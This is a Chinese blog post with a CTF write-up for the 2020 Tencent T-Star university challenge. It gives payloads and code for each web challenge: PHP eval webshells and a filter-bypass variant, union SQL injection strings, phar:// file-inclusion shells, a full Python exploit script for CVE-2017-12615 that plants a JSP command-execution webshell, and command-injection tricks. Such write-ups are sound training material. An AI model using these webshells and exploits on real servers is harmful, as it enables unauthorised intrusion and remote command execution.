Beytagh's blog

PWN oh!

0%

2020腾讯犀牛鸟网络安全T-Star高校挑战赛

发表于 更新于 分类于

2020腾讯犀牛鸟网络安全T-Star高校挑战赛WriteUP

一、签到题

使用google chrome设置里的禁用js功能,禁用js直接上传一句话马

image-20200630100842702

连接即可

image-20200630100932794

二、基础命令执行

无防护命令执行,使用管道符直接绕过

image-20200630101149346

flag{usderhky}

三、你能爆破吗

用户admin,密码admin登录成功,查看cookie数据是base64的admin,测试时需要base64编码

cookie处测试单引号,页面返回是用双引号闭合故使用双引号闭合,测试字段数为3时不会报错

1” union select 1,2,database()#

MSIgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw==

image-20200630104721317

爆表名

1” union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’#

MSIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIw==

爆表字段

1” union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’flag’#

MSIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0nZmxhZycj

爆数据

1” union select 1,2,flag from security.flag#

MSIgdW5pb24gc2VsZWN0IDEsMixmbGFnIGZyb20gc2VjdXJpdHkuZmxhZyM=

image-20200630105313887

四、文件上传

没有过滤的后缀: pht ,上传一个pht就可以解析了

上传时应该对<?php、eval都做了过滤,绕过方法:

1
<<??p<?phphp evevalal($_POST[1]);?>

然后填充一下字符,达到20K就可以上传了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /upload.php HTTP/1.1
Host: 7417116e.yunyansec.com
Content-Length: 53918
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://7417116e.yunyansec.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCFQQXXNG9HbLSTFx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://7417116e.yunyansec.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundaryCFQQXXNG9HbLSTFx
Content-Disposition: form-data; name="file"; filename="2.pht"
Content-Type: image/gif

GIF89a
<<??p<?phphp  evevalal($_POST[1]);?>(后面接着N个字符,达到20K就行)
------WebKitFormBoundaryCFQQXXNG9HbLSTFx
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryCFQQXXNG9HbLSTFx--

image-20200630133155289

image-20200630175933177

五、文件包含GetShell

lfi源码在index.php源码处,在包含文件前会在后面拼接.php后缀

1
2
3
4
5
6
7
<?php
$file = $_REQUEST['file'];
if ($file != '') {
    $inc = sprintf("%s.php", $file); // only php file can be included
    include($inc);
}
?>

根据提示,使用phar协议,题目要求只能上传txt,我们把压缩好的zip后缀改为txt再上传

image-20200630120023013

http://56781788.yunyansec.com/lfi.php?file=phar://files/xnbuCDBlNRJ8OKJ2.txt/phpinfo

image-20200630120040815

改为POST.txt上传getshell

image-20200630120606556

http://cbd770a4.yunyansec.com/lfi.php?file=phar://files/C1pYLZLNXgZedimk.txt/POST

image-20200630115839307

六、成绩单

加上单引号就报错,猜测字符型注入

1’ order by 5#

字段数为4

-1’ union select 1,2,3,4#

四个可以显示的位置,我们用第四个就可以了

爆表

-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=’web1’#

爆表字段

-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=’fl4g’#

爆数据

-1’ union select 1,2,3,flag from web1.fl4g#

flag{Sql_INJECT0N_4813drd8hz4}

七、小猫咪踩灯泡

CVE-2017-12615任意文件上传,用网上dalao写的python脚本(比手工快多了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#! -*- coding:utf-8 -*- 

import httplib
import sys
import time

body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''

try:
    conn = httplib.HTTPConnection(sys.argv[1])
    conn.request(method='OPTIONS', url='/ffffzz')
    headers = dict(conn.getresponse().getheaders())
    if 'allow' in headers and \
       headers['allow'].find('PUT') > 0 :
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        url = "/" + str(int(time.time()))+'.jsp/'
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
        conn.request( method='PUT', url= url, body=body)
        res = conn.getresponse()
        if res.status  == 201 :
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
        elif res.status == 204 :
            print 'file exists'
        else:
            print 'error'
        conn.close()
    else:
        print 'Server not vulnerable'
except Exception,e:
    print 'Error:', e

执行效果

image-20200630110559458

?&pwd=023&cmd=cat flag.txt

image-20200630110508486

也可以手工用burp抓包改包put方式上传

九、命令执行

1
2
3
4
5
6
7
8
<?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<7){
   echo shell_exec($_GET[1]);
}

?>

字数限制命令执行绕过,key在上一层目录

image-20200630150143797

getshell太麻烦了,尝试无果之后决定换一种思路,直接cat key文件

分别执行两次就好了

http://dbb1b265.yunyansec.com/?1=>cat

http://dbb1b265.yunyansec.com/?1=*%20../*

image-20200630150114603